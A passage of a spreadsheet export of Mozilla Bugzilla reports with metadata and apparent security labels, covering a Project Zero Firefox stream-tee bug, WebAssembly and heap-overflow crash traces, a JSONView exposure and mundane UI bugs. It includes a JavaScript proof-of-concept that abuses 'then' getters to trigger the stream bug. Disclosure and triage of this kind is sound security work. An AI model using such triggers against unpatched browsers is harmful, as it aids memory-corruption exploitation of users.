The code sets the stream's state to `closed`[1] before iterating through the requests, and most
methods that modify the container check that the stream is in the `readable` state first. However,
the `tee` algorithm employs its own set of flags to track the state of the child streams[7]. These
flags only get updated after the loop has ended[6], so `TeeReaderReadHandler` will pass all the
checks even when it's called from inside `ResolvePromise`.
The only remaining obstacle is that `TeeReaderReadHandler` is attached to a promise reaction and is
supposed to always run asynchronously. Therefore, the attacker has to figure out how to
synchronously trigger promise reactions. Roughly speaking, reactions get executed when the last
active `nsAutoMicroTask` object is destroyed. The main challenge here is to run JavaScript outside
the `nsAutoMicroTask` scope. Conventional means of running JS like event handlers, `setTimeout` and
&lt;script&gt; elements won't work as they always instantiate a new `nsAutoMicroTask`. Instead, the
attacker can reuse the `then` accessor technique and execute JavaScript, for example, during
resolution of a promise created by the Fetch API. The stack trace in this case looks as follows:
```
CallGetter
GetExistingProperty
NativeGetPropertyInline
js::NativeGetProperty
js::GetProperty
js::GetProperty
js::GetProperty
ResolvePromiseInternal
js::PromiseObject::resolve
ResolveOrRejectPromise
js::ReadableStreamFulfillReadOrReadIntoRequest
JS::ReadableStreamUpdateDataAvailableFromSource
mozilla::dom::BodyStream::OnInputStreamReady
nsInputStreamReadyEvent::Run
```
All that's left then is to create and immediately destroy an `nsAutoMicroTask` object at the right
time, which is trivial.
VERSION
Firefox 72.0.2
Firefox 74.0a1 (changeset fc5cbea8d173)
REPRODUCTION CASE
```
&lt;body&gt;
&lt;script&gt;
performMicrotaskCheckpoint = () =&gt; {
  document.createNodeIterator(document, -1, {
    acceptNode() {
      return NodeFilter.FILTER_ACCEPT;
  } }).nextNode();
}
runOutsideMicrotasksScope = func =&gt; {
  fetch(location).then(response =&gt; {
    stream = response.body;
    Object.prototype.__defineGetter__('then', () =&gt; {
      delete Object.prototype.then;
      func();
    });
    reader = stream.getReader();
    reader.read();
  });
}
runOutsideMicrotasksScope(() =&gt; {
  let stream = new ReadableStream({ start(ctr) { controller = ctr } });
  let tee_streams = stream.tee();
  let reader = tee_streams[0].getReader();
  reader.read();
  reader.read();
  Object.prototype.__defineGetter__('then', () =&gt; {
    delete Object.prototype.then;
    controller.enqueue('foo');
    performMicrotaskCheckpoint();
  });
  reader.cancel();
});
&lt;/script&gt;
&lt;/body&gt;
```
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will
become visible to the public. The scheduled disclosure date is 2020-04-29. Disclosure at an earlier
date is also possible if agreed upon by all parties.</t>
        </is>
      </c>
      <c r="X5170" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5171">
      <c r="A5171" t="n">
        <v>1823379</v>
      </c>
      <c r="B5171" t="inlineStr">
        <is>
          <t>2023-03-20 05:01:22 -0700</t>
        </is>
      </c>
      <c r="C5171" t="inlineStr">
        <is>
          <t>Incorrect validation for repeated catch blocks</t>
        </is>
      </c>
      <c r="D5171" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:13 -0700</t>
        </is>
      </c>
      <c r="E5171" t="n">
        <v>1</v>
      </c>
      <c r="F5171" t="n">
        <v>1</v>
      </c>
      <c r="G5171" t="n">
        <v>3</v>
      </c>
      <c r="H5171" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5171" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5171" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K5171" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5171" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5171" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5171" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5171" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5171" t="inlineStr">
        <is>
          <t>[adv-main113+][adv-ESR102.11+]</t>
        </is>
      </c>
      <c r="Q5171" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5171" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5171" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T5171" t="n">
        <v>1</v>
      </c>
      <c r="U5171" t="n">
        <v>0</v>
      </c>
      <c r="V5171" t="n">
        <v>29</v>
      </c>
      <c r="W5171" t="inlineStr">
        <is>
          <t>Created attachment 9323912
poc.js
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Steps to reproduce:
The vulnerability exists in the Javascript engine under the ARM64 architecture, so it needs to be reproduced in the gecko in ARM64. The configuration for building is as follows:
ac_add_options --enable-fuzzing
ac_add_options --enable-gczeal
ac_add_options --enable-project=js
ac_add_options --enable-optimize
ac_add_options --enable-debug
Commit: 8ed22fcd56968c95a73a6c82b42f732f01a4bdae
Actual results:
This is the full crash log of the debug build:
```
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==15739==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000024 (pc 0x000103a5abbc bp 0x00016db0ead0 sp 0x00016db0ea70 T644387)
==15739==The signal is caused by a READ memory access.
==15739==Hint: address points to the zero page.
    #0 0x103a5abbc in (anonymous namespace)::FunctionCompiler::checkOffsetAndAlignmentAndBounds(js::wasm::MemoryAccessDesc*, js::jit::MDefinition**)+0xd0 (js:arm64+0x10176ebbc) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #1 0x103a5c2d8 in (anonymous namespace)::FunctionCompiler::store(js::jit::MDefinition*, js::wasm::MemoryAccessDesc*, js::jit::MDefinition*)+0x134 (js:arm64+0x1017702d8) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #2 0x103a173e0 in EmitStore((anonymous namespace)::FunctionCompiler&amp;, js::wasm::PackedType&lt;js::wasm::ValTypeTraits&gt;, JS::Scalar::Type)+0x2a0 (js:arm64+0x10172b3e0) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #3 0x1039c2700 in EmitBodyExprs((anonymous namespace)::FunctionCompiler&amp;)+0x9cc (js:arm64+0x1016d6700) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #4 0x1039c08fc in js::wasm::IonCompileFunctions(js::wasm::ModuleEnvironment const&amp;, js::wasm::CompilerEnvironment const&amp;, js::LifoAlloc&amp;, mozilla::Vector&lt;js::wasm::FuncCompileInput, 8ul, js::SystemAllocPolicy&gt; const&amp;, js::wasm::CompiledCode*, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;*)+0xdb4 (js:arm64+0x1016d48fc) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #5 0x10396e914 in ExecuteCompileTask(js::wasm::CompileTask*, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;*)+0x19c (js:arm64+0x101682914) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #6 0x103970870 in js::wasm::ModuleGenerator::finishFuncDefs()+0x40 (js:arm64+0x101684870) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #7 0x10393d138 in bool DecodeCodeSection&lt;js::wasm::Decoder&gt;(js::wasm::ModuleEnvironment const&amp;, js::wasm::Decoder&amp;, js::wasm::ModuleGenerator&amp;)+0x44c (js:arm64+0x101651138) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #8 0x10393cbd4 in js::wasm::CompileBuffer(js::wasm::CompileArgs const&amp;, js::wasm::ShareableBytes const&amp;, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;*, mozilla::Vector&lt;mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;, 0ul, js::SystemAllocPolicy&gt;*, JS::OptimizedEncodingListener*)+0x300 (js:arm64+0x101650bd4) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #9 0x1039d8f60 in js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*)+0x21c (js:arm64+0x1016ecf60) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #10 0x1023cee90 in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&amp;)+0x1a4 (js:arm64+0x1000e2e90) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #11 0x1023ddf00 in CallJSNativeConstructor(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;)+0xa4 (js:arm64+0x1000f1f00) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #12 0x1023d0400 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason)+0x368 (js:arm64+0x1000e4400) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #13 0x1023c5c74 in Interpret(JSContext*, js::RunState&amp;)+0x6830 (js:arm64+0x1000d9c74) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #14 0x1023bf030 in js::RunScript(JSContext*, js::RunState&amp;)+0x1e8 (js:arm64+0x1000d3030) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #15 0x1023d111c in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;)+0x288 (js:arm64+0x1000e511c) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #16 0x1023d1624 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;)+0x200 (js:arm64+0x1000e5624) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #17 0x10251df58 in ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;)+0x100 (js:arm64+0x100231f58) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #18 0x10251e160 in JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;)+0xd8 (js:arm64+0x100232160) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #19 0x102358d30 in RunFile(JSContext*, char const*, __sFILE*, CompileUtf8, bool, bool)+0x450 (js:arm64+0x10006cd30) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #20 0x1023582ac in Process(JSContext*, char const*, bool, FileKind)+0x8a4 (js:arm64+0x10006c2ac) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #21 0x1022fc88c in Shell(JSContext*, js::cli::OptionParser*)+0x115c (js:arm64+0x10001088c) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #22 0x1022f6d48 in main+0x690 (js:arm64+0x10000ad48) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00)
    #23 0x195867e4c  (&lt;unknown module&gt;)
    #24 0xda46fffffffffffc  (&lt;unknown module&gt;)
==15739==Register values:
 x[0] = 0x0000000000000001   x[1] = 0x0000000000000001   x[2] = 0x000000016db0eae0   x[3] = 0x0000000000000000
 x[4] = 0x0000000105413d3c   x[5] = 0x00000001039c26f4   x[6] = 0x000000010409ad00   x[7] = 0x000000016db0ea18
 x[8] = 0x00000001054173e7   x[9] = 0x0000000000000001  x[10] = 0x00000001054173e7  x[11] = 0x0000000002000000
x[12] = 0xf8000000ffffffff  x[13] = 0x0000000000000001  x[14] = 0x0000000000000001  x[15] = 0x000000010409b8c4
x[16] = 0x0000000103a8d188  x[17] = 0x00000000000002a1  x[18] = 0x0000000000000000  x[19] = 0x000000016db0eae0
x[20] = 0x000000016db0f020  x[21] = 0x000000016db0eb38  x[22] = 0x0000000000000000  x[23] = 0x0000000002000000
x[24] = 0xaaaaaaaaaaaa0039  x[25] = 0x0000000000000039  x[26] = 0x000000016db0f954  x[27] = 0xaaaaaaaaaaaaaaaa
x[28] = 0x0000000105413d3c     fp = 0x000000016db0ead0     lr = 0x0000000103a5ab78     sp = 0x000000016db0ea70
UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV (js:arm64+0x10176ebbc) (BuildId: 4c4c44b255553144a1deaf01cdd3b98d32000000200000000100000000000b00) in (anonymous namespace)::FunctionCompiler::checkOffsetAndAlignmentAndBounds(js::wasm::MemoryAccessDesc*, js::jit::MDefinition**)+0xd0
==15739==ABORTING
```</t>
        </is>
      </c>
      <c r="X5171" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5172">
      <c r="A5172" t="n">
        <v>1561502</v>
      </c>
      <c r="B5172" t="inlineStr">
        <is>
          <t>2019-06-25 21:50:17 -0700</t>
        </is>
      </c>
      <c r="C5172" t="inlineStr">
        <is>
          <t>By using a form with a data URI it's possible to gain access to the privileged JSONView object that has been cloned into content.</t>
        </is>
      </c>
      <c r="D5172" t="inlineStr">
        <is>
          <t>2024-05-30 10:00:34 -0700</t>
        </is>
      </c>
      <c r="E5172" t="n">
        <v>1</v>
      </c>
      <c r="F5172" t="n">
        <v>1</v>
      </c>
      <c r="G5172" t="n">
        <v>3</v>
      </c>
      <c r="H5172" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5172" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J5172" t="inlineStr">
        <is>
          <t>JSON Viewer</t>
        </is>
      </c>
      <c r="K5172" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5172" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5172" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5172" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5172" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5172" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main70+][adv-esr68.2+]</t>
        </is>
      </c>
      <c r="Q5172" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5172" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5172" t="inlineStr">
        <is>
          <t>Firefox 70</t>
        </is>
      </c>
      <c r="T5172" t="n">
        <v>1</v>
      </c>
      <c r="U5172" t="n">
        <v>0</v>
      </c>
      <c r="V5172" t="n">
        <v>28</v>
      </c>
      <c r="W5172" t="inlineStr">
        <is>
          <t>Created attachment 9074096
ObtainJSONView-testcase-new.html
I'm attaching a testcase that shows this work.  When viewing the testcase click the submit button, and then open the console window and look at testWin.JSONView
The issue here is that defense in depth against data URIs in new tabs actually leaves a small window of time in which it is possible to gain a reference to a JSONView window/tab before it is closed.
This tab just leaves the JSONView Object that has been cloned into the content scope accessible from the window reference that is held.
I was planning to do more work on this seeing as this is a great stepping stone, but my situation and time right now aren't going to allow it.
In the past I believe we treated this as sec-high so yeah.</t>
        </is>
      </c>
      <c r="X5172" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5173">
      <c r="A5173" t="n">
        <v>826783</v>
      </c>
      <c r="B5173" t="inlineStr">
        <is>
          <t>2013-01-04 11:02:42 -0800</t>
        </is>
      </c>
      <c r="C5173" t="inlineStr">
        <is>
          <t>Certificate Viewer Window Is Too Tall</t>
        </is>
      </c>
      <c r="D5173" t="inlineStr">
        <is>
          <t>2016-06-30 03:41:48 -0700</t>
        </is>
      </c>
      <c r="E5173" t="n">
        <v>1</v>
      </c>
      <c r="F5173" t="n">
        <v>1</v>
      </c>
      <c r="G5173" t="n">
        <v>3</v>
      </c>
      <c r="H5173" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5173" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5173" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K5173" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5173" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5173" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5173" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5173" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5173" t="inlineStr">
        <is>
          <t>[psm-assigned]</t>
        </is>
      </c>
      <c r="Q5173" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5173" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5173" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T5173" t="n">
        <v>1</v>
      </c>
      <c r="U5173" t="n">
        <v>1</v>
      </c>
      <c r="V5173" t="n">
        <v>14</v>
      </c>
      <c r="W5173" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 SeaMonkey/2.14.1
1280x720 screen
When I view a particular certificate, the Certificate Viewer window is too tall.  The top of the window extends beyond the top of my monitor screen with just enough of a sliver of the title bar for me to grab and lower.  At the same time, the bottom of the window extends beyond the bottom of my monitor screen, making the buttons at the bottom unreachable.  
Despite the closure of bug #108056, the window still cannot be resized.  While I can drag the window lower, I cannot drag it higher.  
I see this problem with certificates both on the Servers tab and the Authorities tab.  (I have no certificates on the other tabs.)  
Because my eyes are more than 70 years old, I set my Windows properties for large type and my SeaMonkey preferences for default fonts at 16 with a minimum of 10.</t>
        </is>
      </c>
      <c r="X5173" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5174">
      <c r="A5174" t="n">
        <v>656277</v>
      </c>
      <c r="B5174" t="inlineStr">
        <is>
          <t>2011-05-11 06:50:16 -0700</t>
        </is>
      </c>
      <c r="C5174" t="inlineStr">
        <is>
          <t>Prevent loading WebGL textures from cross-domain images</t>
        </is>
      </c>
      <c r="D5174" t="inlineStr">
        <is>
          <t>2013-12-27 14:37:28 -0800</t>
        </is>
      </c>
      <c r="E5174" t="n">
        <v>1</v>
      </c>
      <c r="F5174" t="n">
        <v>1</v>
      </c>
      <c r="G5174" t="n">
        <v>3</v>
      </c>
      <c r="H5174" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5174" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5174" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5174" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5174" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5174" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5174" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5174" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5174" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q5174" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5174" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5174" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T5174" t="n">
        <v>1</v>
      </c>
      <c r="U5174" t="n">
        <v>1</v>
      </c>
      <c r="V5174" t="n">
        <v>37</v>
      </c>
      <c r="W5174" t="inlineStr">
        <is>
          <t>In order to fix bug 655987 i.e. respond to this exploit,
  http://www.contextis.co.uk/resources/blog/webgl/poc/index.html
We need to prevent using cross-domain images as WebGL textures. We also need to prevent using a canvas/2d as proxy for doing the same thing. Then we may consider relaxing this with CORS.</t>
        </is>
      </c>
      <c r="X5174" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5175">
      <c r="A5175" t="n">
        <v>1580229</v>
      </c>
      <c r="B5175" t="inlineStr">
        <is>
          <t>2019-09-10 08:24:00 -0700</t>
        </is>
      </c>
      <c r="C5175" t="inlineStr">
        <is>
          <t>Job link should highlight the treeherder job</t>
        </is>
      </c>
      <c r="D5175" t="inlineStr">
        <is>
          <t>2019-09-10 11:57:04 -0700</t>
        </is>
      </c>
      <c r="E5175" t="n">
        <v>1</v>
      </c>
      <c r="F5175" t="n">
        <v>1</v>
      </c>
      <c r="G5175" t="n">
        <v>7</v>
      </c>
      <c r="H5175" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5175" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5175" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K5175" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5175" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5175" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5175" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5175" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5175" t="inlineStr"/>
      <c r="Q5175" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5175" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5175" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5175" t="n">
        <v>1</v>
      </c>
      <c r="U5175" t="n">
        <v>0</v>
      </c>
      <c r="V5175" t="n">
        <v>4</v>
      </c>
      <c r="W5175" t="inlineStr">
        <is>
          <t>STR:
1. Open:
https://treeherder.mozilla.org/perf.html#/graphs?timerange=1209600&amp;series=mozilla-inbound,1950177,1,1&amp;series=autoland,1927519,1,1&amp;highlightAlerts=1&amp;zoom=1567126075667,1568056709722,0.7646447258809459,1.0293452742456655&amp;selected=1927519,549883,1085.7587460024768,183.9848493829924
2. Select a data point
3. Click on 'job' in the available buble
Actual:
3. The treherder page is opened
Expected
3. The treherder job should point to the specific job/"build" that run
Actual link it opens:
https://treeherder.mozilla.org/#/jobs?repo=autoland&amp;revision=e5b3436fc27756fb291712258df67e0605d181a8?selectedJob=265546964&amp;group_state=expanded
Expected link:
https://treeherder.mozilla.org/#/jobs?repo=autoland&amp;revision=e5b3436fc27756fb291712258df67e0605d181a8&amp;selectedJob=265546964&amp;group_state=expanded
Notice the 
Actual:
`?selectedJob`
Expected:
`&amp;selectedJob`</t>
        </is>
      </c>
      <c r="X5175" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5176">
      <c r="A5176" t="n">
        <v>1240760</v>
      </c>
      <c r="B5176" t="inlineStr">
        <is>
          <t>2016-01-19 07:24:52 -0800</t>
        </is>
      </c>
      <c r="C5176" t="inlineStr">
        <is>
          <t>Second datachannel with id crashes in PR_Unlock | mozilla::DataChannelConnection::Close after navigation</t>
        </is>
      </c>
      <c r="D5176" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:30 -0700</t>
        </is>
      </c>
      <c r="E5176" t="n">
        <v>1</v>
      </c>
      <c r="F5176" t="n">
        <v>1</v>
      </c>
      <c r="G5176" t="n">
        <v>3</v>
      </c>
      <c r="H5176" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5176" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5176" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K5176" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L5176" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5176" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5176" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5176" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q5176" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5176" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5176" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T5176" t="n">
        <v>1</v>
      </c>
      <c r="U5176" t="n">
        <v>0</v>
      </c>
      <c r="V5176" t="n">
        <v>26</v>
      </c>
      <c r="W5176" t="inlineStr">
        <is>
          <t>Created attachment 8709456
ff-crash-datachannel.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20160106231438
Steps to reproduce:
Load the attached page
Actual results:
The page loads, redirects to mozilla.org, and after ~20 seconds, Firefox crashes.
This is reproducible with any other navigation action, including a simple reload.
from my quick tests, it only happens when 2 data channels are open, with the 2nd set to use the same id as the one the first one automatically gets; it's probably somewhat related to https://bugzilla.mozilla.org/show_bug.cgi?id=1017462
Expected results:
Firefox should not have crashed</t>
        </is>
      </c>
      <c r="X5176" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5177">
      <c r="A5177" t="n">
        <v>785720</v>
      </c>
      <c r="B5177" t="inlineStr">
        <is>
          <t>2012-08-26 09:18:09 -0700</t>
        </is>
      </c>
      <c r="C5177" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsHTMLEditor::IsPrevCharInNodeWhitespace</t>
        </is>
      </c>
      <c r="D5177" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:35 -0700</t>
        </is>
      </c>
      <c r="E5177" t="n">
        <v>1</v>
      </c>
      <c r="F5177" t="n">
        <v>1</v>
      </c>
      <c r="G5177" t="n">
        <v>3</v>
      </c>
      <c r="H5177" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5177" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5177" t="inlineStr">
        <is>
          <t>MathML</t>
        </is>
      </c>
      <c r="K5177" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5177" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5177" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5177" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5177" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5177" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5177" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5177" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T5177" t="n">
        <v>1</v>
      </c>
      <c r="U5177" t="n">
        <v>0</v>
      </c>
      <c r="V5177" t="n">
        <v>38</v>
      </c>
      <c r="W5177" t="inlineStr">
        <is>
          <t>Created attachment 655434
Testcase
Reproduces on trunk
20120825191419
http://hg.mozilla.org/mozilla-central/rev/e874475efe15
=================================================================
==30534== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f5f56a1dc9d at pc 0x7f5f78caed33 bp 0x7fffd1793670 sp 0x7fffd1793668
READ of size 1 at 0x7f5f56a1dc9d thread T0
    #0 0x7f5f78caed32 in nsTextFragment::CharAt(int) const src/layout/base/../../content/base/src/nsTextFragment.h:178
    #1 0x7f5f7ddfe7cf in nsHTMLEditor::IsPrevCharInNodeWhitespace(nsIContent*, int, bool*, bool*, nsIContent**, int*) src/editor/libeditor/html/nsHTMLEditor.cpp:901
    #2 0x7f5f7dfe2654 in nsHTMLEditRules::GetPromotedPoint(nsHTMLEditRules::RulesEndpoint, nsIDOMNode*, int, EditAction, nsCOMPtr&lt;nsIDOMNode&gt;*, int*) src/editor/libeditor/html/nsHTMLEditRules.cpp:5240
    #3 0x7f5f7def0402 in nsHTMLEditRules::PromoteRange(nsIDOMRange*, EditAction) src/editor/libeditor/html/nsHTMLEditRules.cpp:5492
    #4 0x7f5f7deeaaa2 in nsHTMLEditRules::AfterEditInner(EditAction, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:430
    #5 0x7f5f7dee8d90 in nsHTMLEditRules::AfterEdit(EditAction, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:376
    #6 0x7f5f7de57aac in nsHTMLEditor::EndOperation() src/editor/libeditor/html/nsHTMLEditor.cpp:3513
    #7 0x7f5f7d899f1c in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:95
    #8 0x7f5f7d877ba2 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:92
    #9 0x7f5f7d87dafc in nsPlaintextEditor::InsertText(nsAString_internal const&amp;) src/editor/libeditor/text/nsPlaintextEditor.cpp:728
